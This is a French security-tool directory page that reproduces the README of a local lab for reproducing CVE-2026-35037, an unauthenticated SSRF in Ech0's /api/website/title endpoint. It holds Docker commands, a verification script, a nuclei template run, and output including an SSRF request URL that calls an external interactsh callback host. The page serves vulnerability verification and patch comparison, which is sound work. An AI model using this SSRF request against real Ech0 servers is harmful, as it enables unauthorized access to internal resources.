Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
POC_CVE-2026-35037 — Labo de reproduction isolé en local pour CVE-2026-35037, une vulnérabilité SSRF non authentifiée dans le point de terminaison GET /api/website/title d'Ech0. Comprend une configuration Docker Compose, un script de vérification et un modèle nuclei pour la validation. | Kitploit
Outils/GitHubGitHub/fineman999/poc_cve-2026-35037
Analyse des VulnérabilitésExploitationSécurité WebTests d'IntrusionApprentissage et ÉducationLabs et Pratique
GitHubfineman999/poc_cve-2026-35037

POC_CVE-2026-35037

Labo de reproduction isolé en local pour CVE-2026-35037, une vulnérabilité SSRF non authentifiée dans le point de terminaison GET /api/website/title d'Ech0. Comprend une configuration Docker Compose, un script de vérification et un modèle nuclei pour la validation.

Voir le dépôt
2il y a 3 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-35037 Laboratoire SSRF Ech0

Ce dépôt contient un laboratoire de reproduction local et isolé pour CVE-2026-35037, une vulnérabilité SSRF non authentifiée dans le point d'accès GET /api/website/title d'Ech0.

Le laboratoire utilise un serveur de preuves local contrôlé au lieu de métadonnées cloud ou d'infrastructure tierce.

Résumé

  • Produit : lin-snow/Ech0
  • Vulnérabilité : Server-Side Request Forgery
  • CVE : CVE-2026-35037
  • GHSA : GHSA-cqgf-f4x7-g6wc
  • Versions affectées : GHSA liste <= 4.2.1 ; NVD décrit les versions antérieures à 4.2.8
  • Version corrigée : 4.2.8
  • Point d'accès : GET /api/website/title
  • Paramètre : website_url
  • Authentification : non requise dans la version vulnérable
  • Références :

    • https://nvd.nist.gov/vuln/detail/CVE-2026-35037
    • https://github.com/lin-snow/Ech0/security/advisories/GHSA-cqgf-f4x7-g6wc

    Fichiers

    • docker-compose.yml : démarre Ech0 et un serveur HTTP de preuves local
    • Dockerfile.ech0-lab : construit Ech0 à partir du tag officiel GitHub
    • verify-cve-2026-35037.sh : envoie la requête de vérification SSRF contrôlée
    • evidence/index.html : page HTML contrôlée avec un <title> unique
    • nuclei/CVE-2026-35037.yaml : candidat modèle nuclei

    Pourquoi Construire à Partir des Sources ?

    Les tags Docker historiques vulnérables comme sn0wl1n/ech0:4.2.1 n'étaient pas disponibles lors de la création de ce laboratoire. Le laboratoire construit à partir des tags GitHub officiels lin-snow/Ech0 à la place :

    • v4.2.1 pour le candidat vulnérable
    • v4.2.8 pour la comparaison corrigée

    Le Dockerfile local évite également les problèmes de construction en amont observés avec le build.Dockerfile historique.

    Prérequis

    • Docker Engine ou Docker Desktop
    • curl
    • Optionnel : nuclei

    Exécutez ceci uniquement dans un laboratoire local isolé. N'utilisez pas ces commandes contre des systèmes tiers. Utilisez uniquement contre des systèmes que vous possédez ou pour lesquels vous avez une autorisation écrite explicite de tester.

    Reproduire le Comportement Vulnérable

    Démarrez Ech0 v4.2.1 :

    root@kitploit:~
    ECH0_TAG=4.2.1 docker compose up -d --build
    

    Envoyez la requête de vérification contrôlée :

    root@kitploit:~
    sh verify-cve-2026-35037.sh
    

    Réponse vulnérable attendue :

    root@kitploit:~
    HTTP/1.1 200 OK
    Content-Type: application/json; charset=utf-8
    
    {"code":1,"msg":"获取网站标题成功","data":"ECH0-SSRF-CVE-2026-35037"}
    

    Confirmez qu'Ech0 a atteint le serveur de preuves contrôlé :

    root@kitploit:~
    docker compose logs evidence
    

    Journal de preuves observé :

    root@kitploit:~
    ech0-cve-2026-35037-evidence  | 192.168.107.3 - - [20/May/2026 03:48:51] "GET / HTTP/1.1" 200 -
    

    Comparer la Version Corrigée

    Démarrez Ech0 v4.2.8 :

    root@kitploit:~
    docker compose down -v
    ECH0_TAG=4.2.8 docker compose up -d --build
    

    Exécutez la même requête :

    root@kitploit:~
    sh verify-cve-2026-35037.sh
    

    Réponse corrigée observée :

    root@kitploit:~
    HTTP/1.1 401 Unauthorized
    Content-Type: application/json; charset=utf-8
    
    {"code":0,"msg":"未找到令牌,请点击右上角登录","error_code":"TOKEN_MISSING","message_key":"auth.token_missing","data":null}
    

    Validation Nuclei

    Validez le modèle :

    root@kitploit:~
    nuclei -validate -t nuclei/CVE-2026-35037.yaml
    

    Exécutez contre la version vulnérable v4.2.1 :

    root@kitploit:~
    nuclei -t nuclei/CVE-2026-35037.yaml -u http://127.0.0.1:6277
    

    Résultat vulnérable observé :

    root@kitploit:~
    [INF] Using Interactsh Server: oast.online
    [CVE-2026-35037] [http] [high] http://127.0.0.1:6277/api/website/title?website_url=http://d86j283ea0u4jbaqj8dgo4cgc4jhn7r3f.oast.online/
    [INF] Scan completed in 6.425886625s. 1 matches found.
    

    Exécutez contre la version corrigée v4.2.8 :

    root@kitploit:~
    nuclei -t nuclei/CVE-2026-35037.yaml -u http://127.0.0.1:6277
    

    Résultat corrigé observé :

    root@kitploit:~
    [INF] Using Interactsh Server: oast.fun
    [INF] Scan completed in 5.974574416s. No results found.
    

    Nettoyage

    root@kitploit:~
    docker compose down -v
    

    Remarques

    • Le laboratoire manuel utilise http://evidence:8080/ à l'intérieur du réseau Docker Compose.
    • Le modèle nuclei utilise {{interactsh-url}} et nécessite le support OAST/interactsh.
    • Le modèle nuclei utilise {{interactsh-url}}, qui contacte par défaut les serveurs interactsh de ProjectDiscovery comme oast.online ou oast.fun. Utilisez -iserver pour remplacer le serveur ou -ni pour désactiver interactsh.
    • Le laboratoire ne sonder pas les points d'accès aux métadonnées cloud.
    • Le laboratoire ne contacte pas de cibles de production ou tierces, à l'exception des téléchargements normaux de dépendances/images lors de la construction Docker.
    Télécharger l’outil